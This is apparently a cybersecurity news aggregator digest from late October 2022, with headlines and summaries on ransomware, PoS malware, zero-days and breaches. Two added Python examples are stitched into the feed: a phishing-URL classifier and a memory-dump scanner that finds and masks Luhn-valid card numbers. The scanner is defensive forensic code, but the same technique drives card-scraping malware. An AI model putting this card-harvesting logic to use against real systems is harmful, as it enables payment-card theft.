                2022-10-26 https://thehackernews.com/2022/10/us-charges-ukrainian-hacker-over-role.html
                A 26-year-old Ukrainian national has been charged in the U.S. for his alleged role in the Raccoon Stealer malware-as-a-service (MaaS) operation. Mark Sokolovsky, who was arrested by Dutch law enforcement after leaving Ukraine on March 4, 2022, in what's said to be a Porsche Cayenne, is currently being held in the Netherlands and awaits extradition to the U.S. "Individuals who deployed Raccoon "

                Autosummary: "


                This 9-Course Bundle Can Take Your Cybersecurity Skills to the Next Level

                ciber
                2022-10-26 https://thehackernews.com/2022/10/this-9-course-bundle-can-take-your.html
                If you regularly read The Hacker News, there’s a fair chance that you know something about cybersecurity. It’s possible to turn that interest into a six-figure career. But to make the leap, you need to pick up some key skills and professional certifications. Featuring nine in-depth courses, The 2022 Masters in Cyber Security Certification Bundle helps you get ready for the next step. And in a "

                Autosummary: Just as importantly, the training provides full prep for CISSP, CISM, CISA, and other important exams. "


                Kimsuky Hackers Spotted Using 3 New Android Malware to Target South Koreans

                exploits
                2022-10-26 https://thehackernews.com/2022/10/kimsuky-hackers-spotted-using-3-new.html
                The North Korean espionage-focused actor known as Kimsuky has been observed using three different Android malware strains to target users located in its southern counterpart. That's according to findings from South Korean cybersecurity company S2W, which named the malware families FastFire, FastViewer, and FastSpy. "The FastFire malware is disguised as a Google security plugin, and the "

                Autosummary: "


                Parcel delivery scams are on the rise: Do you know what to watch out for?

                financial
                2022-10-26 https://www.welivesecurity.com/2022/10/26/parcel-delivery-scams-know-what-watch-out-for/

                As package delivery scams that spoof DHL, USPS and other delivery companies soar, here’s how to stay safe not just this shopping season

                The post Parcel delivery scams are on the rise: Do you know what to watch out for? appeared first on WeLiveSecurity

                "

                Autosummary: Consider the following: don’t click on links to enter personal information, including login credentials and financial information, from an unsolicited email or text message; regularly back up your device; look out for the tell-tale signs of a phishing scam (urgency, out-of-the-blue requests for financial or other information, imposter URLs, spelling and grammatical errors, and requests for money in return for delivery); if you receive an email that looks suspicious, visit the official website of the delivery company rather than follow a link embedded in the message; download reputable multi-layered security software with anti-phishing capabilities to all your devices. As the holiday season approaches, there’s an even greater chance that we’ll either lose track of what we’ve bought or we’ll be expecting gifts purchased by others. The lures could be: a request for an additional payment to complete delivery; a demand for payment due to a supposedly incorrect delivery address; a request for email verification (password) in order to track a (non-existent) parcel; or a request for name, full address and phone number due to “delivery failure”. There are also multiple varieties of smishing (phishing via text) scams of this sort, which leverage the fact that many delivery companies also update their customers via SMS. "
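                One of the tell-tale signs listed above, imposter URLs, can be checked mechanically rather than by eye. The Python below is an added example and not code from the WeLiveSecurity article: it pulls every URL out of a message and classifies each one against a small allowlist of carrier domains, treating a host that is not under an allowed domain but still carries a carrier's name as an imposter. The allowlist (dhl.com, dhl.de, usps.com, fedex.com), the brand keywords and the sample SMS are assumptions constructed for the example; the name-match heuristic will also flag unrelated hosts that happen to contain a carrier name, so an "imposter" verdict is a reason to open the carrier's site by hand, not proof of fraud.

```python
import re
from urllib.parse import urlparse

# Assumed allowlist for this example: brand keyword -> domains treated as
# legitimate for that carrier. Verify a carrier's real domains before relying
# on a list like this.
LEGITIMATE_DOMAINS = {
    "dhl": {"dhl.com", "dhl.de"},
    "usps": {"usps.com"},
    "fedex": {"fedex.com"},
}

# Crude URL extractor: http(s) scheme up to the next whitespace or quote.
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)


def hostname_of(url: str) -> str:
    """Lower-cased hostname of a URL; credentials, port and path are dropped."""
    return (urlparse(url).hostname or "").lower().rstrip(".")


def is_under(host: str, domain: str) -> bool:
    """True if host is exactly domain or a subdomain of it.

    'dhl.com.parcel-update.top' is NOT under 'dhl.com': the check is on the
    right-hand side of the name, which is the part the registrant controls.
    """
    return host == domain or host.endswith("." + domain)


def classify_url(url: str) -> str:
    """Return 'legitimate', 'imposter' or 'unknown' for one URL."""
    host = hostname_of(url)
    if not host:
        return "unknown"
    for domains in LEGITIMATE_DOMAINS.values():
        if any(is_under(host, d) for d in domains):
            return "legitimate"
    # A carrier's name appears in the host, but the host is not one of its
    # domains: the classic 'dhl.com-track.xyz' lookalike.
    squashed = host.replace("-", "").replace("_", "")
    if any(brand in squashed for brand in LEGITIMATE_DOMAINS):
        return "imposter"
    return "unknown"


def scan_message(text: str) -> list:
    """Every URL in a message paired with its classification."""
    return [(u, classify_url(u)) for u in URL_RE.findall(text)]


# Constructed sample SMS for the example (not a real message).
SAMPLE_SMS = (
    "DHL: your parcel is on hold, a customs fee of 1.99 EUR is due. "
    "Pay now at https://dhl.com-track.xyz/pay to avoid return. "
    "Official tracking: https://www.dhl.com/track?id=123"
)

if __name__ == "__main__":
    for url, verdict in scan_message(SAMPLE_SMS):
        print(f"{verdict:10} {url}")
```

                The suffix test in is_under is the important part: a lookalike such as dhl.com.parcel-update.top puts the real brand on the left, where anyone can put anything, while the registered domain is the right-hand end of the name.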


                See Tickets discloses data breach, customers’ credit card data exposed

                financial
                2022-10-26 https://securityaffairs.co/wordpress/137673/data-breach/see-tickets-data-breach.html

                International ticketing services company See Tickets disclosed a data breach that exposed customers’ payment card details. Ticketing service company See Tickets disclosed a data breach, and threat actors might have accessed customers’ payment card details. Threat actors were able to steal payment card data by implanting a software skimmer on its website. The company discovered […]

                The post See Tickets discloses data breach, customers’ credit card data exposed appeared first on Security Affairs.

                "

                Autosummary: Stolen data includes name, address, zip code, payment card number, card expiration date, and CVV number. "


                US agencies issue warning about DAIXIN Team ransomware

                exploits ransomware
                2022-10-26 https://www.malwarebytes.com/blog/news/2022/10/fbi-cisa-hhs-issue-joint-alert-about-daixin-ransomware-team

                Categories: News, Ransomware. Tags: DAIXIN, FBI, CISA, HHS, ransomware team, DAIXIN Team, ransomware

                The FBI, CISA, and HHS have issued a joint advisory about a new threat to healthcare organizations

                The post US agencies issue warning about DAIXIN Team ransomware appeared first on Malwarebytes Labs.

                "

                Autosummary: Posted: October 26, 2022. The FBI, Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) have issued a joint advisory about DAIXIN Team, a fledgling ransomware and data exfiltration group that has been targeting US healthcare. "


                Point-of-sale malware used to steal 167,000 credit cards

                exploits
                2022-10-26 https://www.malwarebytes.com/blog/news/2022/10/point-of-sale-malware-used-stole-the-details-of-over-167000-credit-cards

                Categories: News. Tags: POS, malware, credit card, credit identity theft, C2, MajikPOS, Treasure Hunter

                Researchers have discovered the theft of 167,000 sets of credit card details by MajikPOS and Treasure Hunter POS malware

                The post Point-of-sale malware used to steal 167,000 credit cards appeared first on Malwarebytes Labs.

                "

                Autosummary: Posted: October 26, 2022. In the 19 months between February 2021 and September 2022, two point-of-sale (POS) malware operators have stolen more than 167,000 payment records, mainly from the US, according to researchers at Group-IB. "


                iPhone zero-day. Update your devices now!

                exploits
                2022-10-26 https://www.malwarebytes.com/blog/news/2022/10/zero-day-threat-discovered-for-iphones-and-ipads.-update-your-devices-now

                Categories: News. Tags: iPhone, iPad, Apple, zero day, exploit, bug, threat, CVE-2022-42827

                A zero-day bug that affects iPhones and iPads is being exploited in the wild

                The post iPhone zero-day. Update your devices now! appeared first on Malwarebytes Labs.

                "

                Autosummary: According to Apple, the issue impacts: iPhone 8 and later; iPad Pro (all models); iPad Air 3rd generation and later; iPad 5th generation and later; iPad mini 5th generation and later. At time of writing, there is very little you can do other than fire up your Apple product and make your way to the updates section. "


                InterVision partners with Arctic Wolf to defend organizations against cyberattacks

                ciber
                2022-10-26 https://www.helpnetsecurity.com/2022/10/27/intervision-arctic-wolf/

                InterVision has teamed with Arctic Wolf to help proactively protect organizations against today’s cyberattacks. The Arctic Wolf Security Operations Cloud pairs the power, speed, and scale of a cloud-native platform with world-class security operations expertise that provides organizations with comprehensive coverage across the entire security operations framework. InterVision offers comprehensive cybersecurity protection, backed by SLAs. Ransomware Protection as a Service proactively detects, protects, and defends against cybersecurity crimes. “We are excited to have InterVision as … More

                The post InterVision partners with Arctic Wolf to defend organizations against cyberattacks appeared first on Help Net Security.

                "

                Autosummary: "


                Arnica raises $7 million to protect software supply chains without harming developer velocity

                government
                2022-10-26 https://www.helpnetsecurity.com/2022/10/27/arnica-funding/

                Arnica has unveiled the general availability of its product and $7 million in seed funding. The round was led by Joule Ventures and First Rays Venture Partners, with angel investment from industry leaders including Avi Shua, co-founder & CEO of Orca Security, Dror Davidoff, co-founder & CEO of Aqua Security and Baruch Sadogursky, Head of Developer Relations of JFrog. Arnica will use the funds to accelerate product development and scale its go-to-market teams. Software supply … More

                The post Arnica raises $7 million to protect software supply chains without harming developer velocity appeared first on Help Net Security.

                "

                Autosummary: The round was led by Joule Ventures and First Rays Venture Partners, with angel investment from industry leaders including Avi Shua, co-founder & CEO of Orca Security, Dror Davidoff, co-founder & CEO of Aqua Security and Baruch Sadogursky, Head of Developer Relations of JFrog. "


                Perygee raises $4.75 million to secure most vulnerable IoT and OT devices

                industry
                2022-10-26 https://www.helpnetsecurity.com/2022/10/27/perygee-funding/

                Perygee has closed a $4.75 million seed investment led by Ballistic Ventures. The round also includes investment from cybersecurity angels Ray Rothrock, John Donovan, Ohad Finkelstein, Corey Thomas, and Bryson Bort, as well as BBG Ventures, which backs early-stage startups with female founders. To date, Perygee has raised $6.35 million in funding. Internet of Things (IoT) and Operational Technology (OT) devices are critical aspects of the supply chain, from manufacturing plants to utilities to hospitals … More

                The post Perygee raises $4.75 million to secure most vulnerable IoT and OT devices appeared first on Help Net Security.

                "

                Autosummary: “Effectively managing several OT systems requires an intelligent solution to handle the complex data challenges,” said Andrew Schaefer, Vice President and CTO of EnVen Energy Corp. “With Perygee, we can quickly provide structure to our data, easily parse and share relevant information with different stakeholders, and automate the maintenance of our data to maintain our security posture over time,” Schaefer continued. The round also includes investment from cybersecurity angels Ray Rothrock, John Donovan, Ohad Finkelstein, Corey Thomas, and Bryson Bort, as well as BBG Ventures, which backs early-stage startups with female founders. "


                Don’t wait for medical device cybersecurity legislation: Act now to save patients’ lives

                ciber
                2022-10-25 https://www.helpnetsecurity.com/2022/10/25/medical-device-cybersecurity-compliance/

                Cyberattacks can cost lives — especially in the healthcare sector. Nearly a quarter of healthcare providers victimized by ransomware reported increased mortality rates following an attack, and 70% experienced longer hospital stays or procedure delays leading to poor patient outcomes. Congress is working to pass cybersecurity legislation, but the process is laborious. Consequently, healthcare systems must act to prevent security breaches and protect patients’ data. More than two-thirds of healthcare providers are victims of cybercrime. … More

                The post Don’t wait for medical device cybersecurity legislation: Act now to save patients’ lives appeared first on Help Net Security.

                "

                Autosummary: The proposal requires the FDA to regularly update cybersecurity guidance, publish public information on improving medical device cybersecurity and resource access, and issue a report identifying challenges in cybersecurity for medical equipment, including legacy devices. The framework consists of five tenets, among them Identify: maintain a complete inventory of devices and software, cybersecurity policies, legal requirements, and vulnerabilities. "


                To retain cybersecurity professionals, keep remote work as an option

                ciber
                2022-10-25 https://www.helpnetsecurity.com/2022/10/25/cybersecurity-professionals-shortage-increase/

                (ISC)² highlighted a stark increase in the shortage of cybersecurity professionals as it announced the findings of its 2022 (ISC)² Cybersecurity Workforce Study. The study reveals the global cybersecurity workforce is at an all-time high, with an estimated 4.7 million professionals. Despite adding 464,000 more cybersecurity professionals this year, the data revealed that 3.4 million more cybersecurity workers are needed to secure assets effectively. 70% of respondents report their organization does not have enough cybersecurity … More

                The post To retain cybersecurity professionals, keep remote work as an option appeared first on Help Net Security.

                "

                Autosummary: "


                The long-term psychological effects of ransomware attacks

                exploits ransomware
                2022-10-25 https://www.helpnetsecurity.com/2022/10/25/psychological-effects-ransomware/

                Northwave has conducted scientific research into the psychological effects of a ransomware crisis on both organizations and individuals. The findings reveal the deep marks that a ransomware crisis leaves on all those affected. It also shows how their IT and security teams can be left in disarray long after the crisis itself has passed. Key findings on psychological effects of ransomware: “The research reveals how the psychological impact of ransomware attacks can persist on people in … More

                The post The long-term psychological effects of ransomware attacks appeared first on Help Net Security.

                "

                Autosummary: Key findings on psychological effects of ransomware “The research reveals how the psychological impact of ransomware attacks can persist on people in affected organizations for a very long time,” explains Organizational Psychologist Inge van der Beijl, Director Behaviour & Resilience at Northwave. One of every seven employees involved in the attack, either directly or indirectly, exhibits severe enough symptoms several months later, at a level considered to be above the clinical threshold at which professional trauma treatment help is needed. These long-term effects impact staff turnover: One in five directly affected by the attack has considered, or is still considering, changing jobs. "


                Apple Releases Patch for New Actively Exploited iOS and iPadOS Zero-Day Vulnerability

                exploits
                2022-10-25 https://thehackernews.com/2022/10/apple-releases-patch-for-new-actively.html
                Tech giant Apple on Monday rolled out updates to remediate a zero-day flaw in iOS and iPadOS that it said has been actively exploited in the wild. The weakness, given the identifier CVE-2022-42827, has been described as an out-of-bounds write issue in the Kernel, which could be abused by a rogue application to execute arbitrary code with the highest privileges. Successful exploitation of "

                Autosummary: An application may be able to execute arbitrary code with kernel privileges. Aside from CVE-2022-42827, the update also addresses 19 other security vulnerabilities, including two in Kernel, three in Point-to-Point Protocol (PPP), two in WebKit, and one each in AppleMobileFileIntegrity, Core Bluetooth, IOKit, Sandbox, and more. "


                Hive claims ransomware attack on Tata Power, begins leaking data

                exploits ransomware
                2022-10-25 https://www.bleepingcomputer.com/news/security/hive-claims-ransomware-attack-on-tata-power-begins-leaking-data/
                Hive ransomware group has claimed responsibility for a cyber attack disclosed by Tata Power this month. In data leak screenshots seen by BleepingComputer, Hive operators are seen leaking data it claims to have stolen from Tata Power, indicating the ransom negotiations failed. [...] "

                Autosummary: Hive ransomware starts leaking data it claims to have stolen from Tata Power. Another researcher, Rakesh Krishnan, shared screenshots of the stolen data, which appears to include Tata Power employees' personally identifiable information (PII), National ID (Aadhar) card numbers, PAN (tax account) numbers, salary information, etc. "


                Apple fixes exploited iOS, iPadOS zero-day (CVE-2022-42827)

                exploits
                2022-10-25 https://www.helpnetsecurity.com/2022/10/25/cve-2022-42827/

                For the ninth time this year, Apple has released fixes for a zero-day vulnerability (CVE-2022-42827) exploited by attackers to compromise iPhones. About CVE-2022-42827 CVE-2022-42827 is an out-of-bounds write issue in the iOS and iPadOS kernel, which can be exploited to allow a malicious application to execute arbitrary code with kernel privileges. “Apple is aware of a report that this issue may have been actively exploited,” the company said, though – as per usual – did … More

                The post Apple fixes exploited iOS, iPadOS zero-day (CVE-2022-42827) appeared first on Help Net Security.

                "

                Autosummary: "


                Cybersecurity event cancelled after scammers disrupt LinkedIn live chat

                financial ciber
                2022-10-25 https://www.bitdefender.com/blog/hotforsecurity/cybersecurity-event-cancelled-after-scammers-disrupt-linkedin-live-chat/
                It was all going so well. At first. Read more in my article on the Hot for Security blog. "

                Autosummary: The AICD eventually cancelled the event, and later made a video of the event available to stream (complete with on-air apology for the "technical difficulties"). The organisation issued a statement to the press, advising anyone who entered their credit card details to inform their banks: "We strongly advise any participants who may have concerns to contact their financial institution as soon as possible." "


                Medibank data breach: More customers affected, attacker got in via stolen credentials

                financial
                2022-10-25 https://www.helpnetsecurity.com/2022/10/25/medibank-breach-customers-affected/

                Australian private health insurance provider Medibank has revealed that the hack and data breach it discovered over two weeks ago has affected more customers than initially thought. “We have received a series of additional files from the criminal. We have been able to determine that this includes: a copy of the file received last week containing 100 ahm policy records (including personal and health claims data); a file of a further 1,000 ahm policy records … More

                The post Medibank data breach: More customers affected, attacker got in via stolen credentials appeared first on Help Net Security.

                "

                Autosummary: These include financial support for especially vulnerable customers, a mental health and wellbeing support line for all customers, access to specialist identity protection advice and resources, free identity monitoring services for customers who have had their primary ID compromised, and reimbursement of fees for re-issue of identity documents that have been fully compromised. "


                Cybercriminals Used Two PoS Malware to Steal Details of Over 167,000 Credit Cards

                exploits ciber
                2022-10-25 https://thehackernews.com/2022/10/cybercriminals-used-two-pos-malware-to.html
                Two point-of-sale (PoS) malware variants have been put to use by a threat actor to steal information related to more than 167,000 credit cards from payment terminals. According to Singapore-headquartered cybersecurity company Group-IB, the stolen data dumps could net the operators as much as $3.34 million by selling them on underground forums. While a significant proportion of attacks aimed at "

                Autosummary: Most of the stolen cards are said to have been issued by banks in the U.S., Puerto Rico, Peru, Panama, the U.K., Canada, France, Poland, Norway, and Costa Rica. "


                Hive ransomware gang starts leaking data allegedly stolen from Tata Power

                exploits ransomware
                2022-10-25 https://securityaffairs.co/wordpress/137601/malware/hive-ransomware-tata-power.html

                The Hive ransomware gang, which claimed responsibility for the Tata Power data breach, started leaking data. On October 14, Tata Power, India’s largest power generation company, announced that it was hit by a cyber attack. Threat actors hit the Information Technology (IT) infrastructure of the company. The company confirmed that the security breach impacted “some of […]

                The post Hive ransomware gang starts leaking data allegedly stolen from Tata Power appeared first on Security Affairs.

                "

                Autosummary: The porting to the Rust language provides the following advantages: it offers memory, data type, and thread safety; it has deep control over low-level resources; it has a user-friendly syntax; it has several mechanisms for concurrency and parallelism, thus enabling fast and safe file encryption; it has a good variety of cryptographic libraries; and it is relatively more difficult to reverse-engineer. The most important change in the latest Hive variant is the encryption mechanism it adopts. "


                VMware fixes critical Cloud Foundation remote code execution bug

                exploits
                2022-10-25 https://www.bleepingcomputer.com/news/security/vmware-fixes-critical-cloud-foundation-remote-code-execution-bug/
                VMware has released security updates today to fix a critical vulnerability in VMware Cloud Foundation, a hybrid cloud platform for running enterprise apps in private or public environments. [...] "

                Autosummary: "


                22-Year-Old Vulnerability Reported in Widely Used SQLite Database Library

                exploits
                2022-10-25 https://thehackernews.com/2022/10/22-year-old-vulnerability-reported-in.html
                A high-severity vulnerability has been disclosed in the SQLite database library, which was introduced as part of a code change dating all the way back to October 2000 and could enable attackers to crash or control programs. Tracked as CVE-2022-35737 (CVSS score: 7.5), the 22-year-old issue affects SQLite versions 1.0.12 through 3.39.1, and has been addressed in version 3.39.2 released on July 21 "

                Autosummary: "


                Hive Ransomware Hackers Begin Leaking Data Stolen from Tata Power Energy Company

                exploits ransomware industry
                2022-10-25 https://thehackernews.com/2022/10/hive-ransomware-hackers-begin-leaking.html
                The Hive ransomware-as-a-service (RaaS) group has claimed responsibility for a cyber attack against Tata Power that was disclosed by the company less than two weeks ago. The incident is said to have occurred on October 3, 2022. The threat actor has also been observed leaking stolen data exfiltrated prior to encrypting the network as part of its double extortion scheme. This allegedly comprises "

                Autosummary: "


                Two PoS Malware used to steal data from more than 167,000 credit cards

                exploits
                2022-10-25 https://securityaffairs.co/wordpress/137608/malware/pos-malware-stolen-card-data.html

                Researchers reported that threat actors used two PoS malware variants to steal information about more than 167,000 credit cards. Cybersecurity firm Group-IB discovered two PoS malware strains used to steal data associated with more than 167,000 credit cards from point-of-sale payment terminals. On April 19, 2022, Group-IB researchers identified the C2 server of the POS malware called MajikPOS. […]

                The post Two PoS Malware used to steal data from more than 167,000 credit cards appeared first on Security Affairs.

                "

                Autosummary: "
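                Card data harvested by point-of-sale malware has a recognisable shape wherever it ends up: a run of 13 to 19 digits that passes the Luhn check, often sitting beside an expiry date in a Track 2 style record. The Python below is an added example, not code from Group-IB or from any of the three articles on these campaigns: it is the kind of scan a defender runs over a process memory dump or a suspect file to confirm that card data is present, and it masks what it finds so the report itself does not become another copy of the PANs. The byte blob is constructed for the example from public test card numbers; a real run would read the dump from disk.

```python
import re

# Candidate: 13 to 19 digits, optionally separated by single spaces or dashes,
# not embedded in a longer digit run (PANs are at most 19 digits, so a
# 20-digit run is noise such as a timestamp or Track 2 discretionary data).
CANDIDATE_RE = re.compile(rb"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_valid(digits: str) -> bool:
    """Mod-10 (Luhn) check digit test used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_pans(blob: bytes) -> list:
    """Return every Luhn-valid 13-19 digit number found in a byte blob."""
    hits = []
    for m in CANDIDATE_RE.finditer(blob):
        digits = re.sub(rb"[ -]", b"", m.group(0)).decode("ascii")
        if 13 <= len(digits) <= 19 and luhn_valid(digits):
            hits.append(digits)
    return hits


def mask(pan: str) -> str:
    """Keep BIN and last four; a report should never carry the full PAN."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


# Constructed stand-in for a memory dump or harvested file (public test card
# numbers only; not real data).
SAMPLE_MEMORY = (
    b"\x00\x00POS-Terminal-07\x00"
    b";4111111111111111=25121010000000000000?\x00"   # Track 2 style record
    b"order_id=1234567890123456\x00"                   # 16 digits, fails Luhn
    b"cardholder=J DOE\x00 3782 822463 10005 \x00"     # 15-digit PAN, spaced
    b"\xff\xfe20221026T101500Z\x00"                    # timestamp, too short
)

if __name__ == "__main__":
    for pan in find_pans(SAMPLE_MEMORY):
        print(mask(pan))
```

                The Luhn test is what separates card numbers from order IDs and timestamps of the same length; the negative lookarounds keep the 20-digit discretionary field after the "=" in the Track 2 record from being split into false positives.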


                Cisco warns admins to patch AnyConnect flaw exploited in attacks

                exploits
                2022-10-25 https://www.bleepingcomputer.com/news/security/cisco-warns-admins-to-patch-anyconnect-flaw-exploited-in-attacks/
                Cisco warned customers today that two security vulnerabilities in the Cisco AnyConnect Secure Mobility Client for Windows are being exploited in the wild. [...] "

                Autosummary: "


                Ukrainian charged for operating Raccoon Stealer malware service

                exploits
                2022-10-25 https://www.bleepingcomputer.com/news/security/ukrainian-charged-for-operating-raccoon-stealer-malware-service/
                26-year-old Ukrainian national Mark Sokolovsky has been charged for his involvement in the Raccoon Stealer malware-as-a-service (MaaS) cybercrime operation. [...] "

                Autosummary: "While an exact number has yet to be verified, FBI agents have identified more than 50 million unique credentials and forms of identification (email addresses, bank accounts, cryptocurrency addresses, credit card numbers, etc.) in the stolen data from what appears to be millions of potential victims around the world," the Department of Justice said in a press release today.


                Microsoft: Vice Society targets schools with multiple ransomware families

                exploits ransomware
                2022-10-25 https://www.bleepingcomputer.com/news/security/microsoft-vice-society-targets-schools-with-multiple-ransomware-families/
                A threat group known as Vice Society has been switching ransomware payloads in attacks targeting the education sector across the United States and worldwide. [...]

                Autosummary: Targets set on U.S. schools: Vice Society is a threat group active since at least early June 2021, known for deploying multiple ransomware strains on their victims' networks, such as Hello Kitty/Five Hands and Zeppelin ransomware.


                Experts disclosed a 22-year-old bug in popular SQLite Database library

                exploits
                2022-10-25 https://securityaffairs.co/wordpress/137629/hacking/cve-2022-35737-sqlite-bug.html

                A high-severity vulnerability, tracked as CVE-2022-35737, has been disclosed in the SQLite database library. The security expert Andreas Kellas detailed a high-severity vulnerability, tracked as CVE-2022-35737 (CVSS score: 7.5), in the SQLite database library, which was introduced in October 2000. The CVE-2022-35737 flaw is an integer overflow issue that impacts SQLite versions 1.0.12 through 3.39.1. The vulnerability was […]

                The post Experts disclosed a 22-year-old bug in popular SQLite Database library appeared first on Security Affairs.


                GoSecure expands partnership with Check Point to improve clients’ cybersecurity defenses

                ciber
                2022-10-25 https://www.helpnetsecurity.com/2022/10/26/gosecure-check-point/

                GoSecure and Check Point partnership will enable GoSecure to add support for Check Point’s security products, expanding their open ecosystem of MDR/XDR technology partners. The new technology partnership with Check Point reinforces GoSecure’s commitment to optimizing clients’ investments in security solutions through a strategic approach to continuously improving clients’ cybersecurity defenses. By focusing on an open ecosystem of technology partners, GoSecure is creating choices for customers as they manage their cybersecurity solutions today and define … More

                The post GoSecure expands partnership with Check Point to improve clients’ cybersecurity defenses appeared first on Help Net Security.


                Cisco warns admins to patch AnyConnect flaws exploited in attacks

                exploits
                2022-10-25 https://www.bleepingcomputer.com/news/security/cisco-warns-admins-to-patch-anyconnect-flaws-exploited-in-attacks/
                Cisco warned customers today that two security vulnerabilities in the Cisco AnyConnect Secure Mobility Client for Windows are being exploited in the wild. [...]


                A cyber threat hunter talks about what he’s learned in his 16+ year cybersecurity career

                ciber
                2022-10-25 https://www.malwarebytes.com/blog/business/2022/10/an-interview-with-cyber-threat-hunter-hiep-hinh

                Categories: Business

                Hiep Hinh breaks down his threat hunting career and shares tips and best practices for those looking to become a cyber threat hunter (or who are just interested to listen!).

                The post A cyber threat hunter talks about what he’s learned in his 16+ year cybersecurity career appeared first on Malwarebytes Labs.

                Autosummary: “You're gonna get an overwhelming amount of data, and will need to put it into segments, separate it, understand it, and then, potentially find something that stands out.” Hiep is an expert user of Endpoint Detection and Response (EDR) platforms and is highly skilled in incident response, DLP (data loss prevention), data mining, and threat hunting, among other things. “It's easy to go after a bunch of indicators, like lists of hashes, looking for VPN and RDP tools, and looking for a lot of freeware stuff that generally is used during attacks, such as IP scanners,” says Hiep. If worse comes to worst, however, and a cyber threat hunter doesn’t know the network well, Hiep says there are “low-hanging fruit” you can look out for. That includes SOC work, forensics, malware analysis, and more, each of which Hiep feels has over the years given him a leg-up in the world of threat hunting.


                Asset risk management: Getting the basics right

                industry
                2022-10-24 https://www.helpnetsecurity.com/2022/10/24/asset-risk-management-challenges/

                In this interview with Help Net Security, Yossi Appleboum, CEO at Sepio, talks about asset risk management challenges for different industries and where it’s heading. Cyberattacks show no signs of slowing down. What do organizations need to do to boost their asset risk management? They need to understand what’s in their environment. You can’t do anything to manage risk if you don’t know what assets you have and their associated risk posture. Increased spending on … More

                The post Asset risk management: Getting the basics right appeared first on Help Net Security.

                Autosummary: So, yes, the asset risk factor will reach new heights because it is an integral part of asset management and, in turn, cybersecurity. In the world of cybersecurity, asset management is, at its core, the understanding of IT assets in an entity’s environment. In this interview with Help Net Security, Yossi Appleboum, CEO at Sepio, talks about asset risk management challenges for different industries and where it’s heading.


                CISA Warns of Daixin Team Hackers Targeting Health Organizations With Ransomware

                exploits ransomware
                2022-10-24 https://thehackernews.com/2022/10/cisa-warns-of-daixin-team-hackers.html
                U.S. cybersecurity and intelligence agencies have published a joint advisory warning of attacks perpetrated by a cybercrime gang known as the Daixin Team primarily targeting the healthcare sector in the country. "The Daixin Team is a ransomware and data extortion group that has targeted the HPH Sector with ransomware and data extortion operations since at least June 2022," the agencies said. The


                Why Ransomware in Education on the Rise and What That Means for 2023

                exploits ransomware
                2022-10-24 https://thehackernews.com/2022/10/why-ransomware-in-education-on-rise-and.html
                The breach of LA Unified School District (LAUSD) highlights the prevalence of password vulnerabilities, as criminal hackers continue to use breached credentials in increasingly frequent ransomware attacks on education. The Labor Day weekend breach of LAUSD brought significant districtwide disruptions to access to email, computers, and applications. It's unclear what student or employee data the

                Autosummary: Beefing up security for 2023: Attackers buy and sell breached passwords on the dark web by the millions, knowing that, due to password reuse, the average credential grants access to many accounts. The FBI and CISA had observed the Vice Society ransomware group, which took credit for the attack, using TTPs including "escalating privileges, then gaining access to domain administrator accounts."


                Security experts targeted with malicious CVE PoC exploits on GitHub

                exploits
                2022-10-24 https://securityaffairs.co/wordpress/137527/hacking/malicious-github-repositories.html

                Researchers discovered thousands of GitHub repositories that offer fake proof-of-concept (PoC) exploits for various flaws used to distribute malware. A team of researchers at the Leiden Institute of Advanced Computer Science (Soufian El Yadmani, Robin The, Olga Gadyatskaya) discovered thousands of repositories on GitHub that offer fake proof-of-concept (PoC) exploits for multiple vulnerabilities. The experts analyzed PoCs shared on […]

                The post Security experts targeted with malicious CVE PoC exploits on GitHub appeared first on Security Affairs.

                Autosummary: “Some proof-of-concepts are fake (i.e., they do not actually offer PoC functionality), or even malicious: e.g., they attempt to exfiltrate data from the system they are being run on, or they try to install malware on this system.” A team of researchers at the Leiden Institute of Advanced Computer Science (Soufian El Yadmani, Robin The, Olga Gadyatskaya) discovered thousands of repositories on GitHub that offer fake proof-of-concept (PoC) exploits for multiple vulnerabilities.


                Cuba ransomware affiliate targets Ukrainian govt agencies

                exploits ransomware
                2022-10-24 https://www.bleepingcomputer.com/news/security/cuba-ransomware-affiliate-targets-ukrainian-govt-agencies/
                The Computer Emergency Response Team of Ukraine (CERT-UA) has issued an alert about potential Cuba Ransomware attacks against critical networks in the country. [...]


                Pendragon car dealer refuses $60 million LockBit ransomware demand

                exploits ransomware
                2022-10-24 https://www.bleepingcomputer.com/news/security/pendragon-car-dealer-refuses-60-million-lockbit-ransomware-demand/
                Pendragon Group, with more than 200 car dealerships in the U.K., was breached in a cyberattack from the LockBit ransomware gang, who allegedly demanded $60 million to decrypt files and not leak them. [...]


                Norway PM warns of Russia cyber threat to oil and gas industry

                industry
                2022-10-24 https://securityaffairs.co/wordpress/137561/cyber-warfare-2/norway-pm-warns-russia-threat.html

                Norway’s prime minister warned last week that Russia poses “a real and serious threat” to the country’s oil and gas industry. Norway’s prime minister Jonas Gahr Støre warned that Russia poses “a real and serious threat” to the country’s oil and gas industry. The minister claims his country is slow in adopting […]

                The post Norway PM warns of Russia cyber threat to oil and gas industry appeared first on Security Affairs.


                Apple fixes new zero-day used in attacks against iPhones, iPads

                exploits
                2022-10-24 https://www.bleepingcomputer.com/news/apple/apple-fixes-new-zero-day-used-in-attacks-against-iphones-ipads/
                In security updates released on Monday, Apple has fixed the ninth zero-day vulnerability used in attacks against iPhones since the start of the year. [...]


                Iran’s atomic energy agency confirms hack after stolen data leaked online

                industry
                2022-10-24 https://www.bleepingcomputer.com/news/security/iran-s-atomic-energy-agency-confirms-hack-after-stolen-data-leaked-online/
                The Iranian Atomic Energy Organization (AEOI) has confirmed that one of its subsidiaries' email servers was hacked after the "Black Reward" hacking group published stolen data online. [...]


                Car dealer group Pendragon refuses to pay $60 million to ransomware extortionists

                exploits ransomware
                2022-10-24 https://grahamcluley.com/car-dealer-group-pendragon-refuses-to-pay-60-million-to-ransomware-extortionists/
                Pendragon - the car dealership group which owns Evans Halshaw, CarStore, and Stratstone, and operates around 160 showrooms across the UK - has confirmed that its IT servers have been hacked by cybercriminals who claim to have stolen five per cent of its data.

                Autosummary: Furthermore, if those responsible are ever identified, the existence of the injunction may help to seek recompense one day, perhaps through seizing their assets.


                Cuba ransomware affiliate targets Ukraine, CERT-UA warns

                exploits ransomware
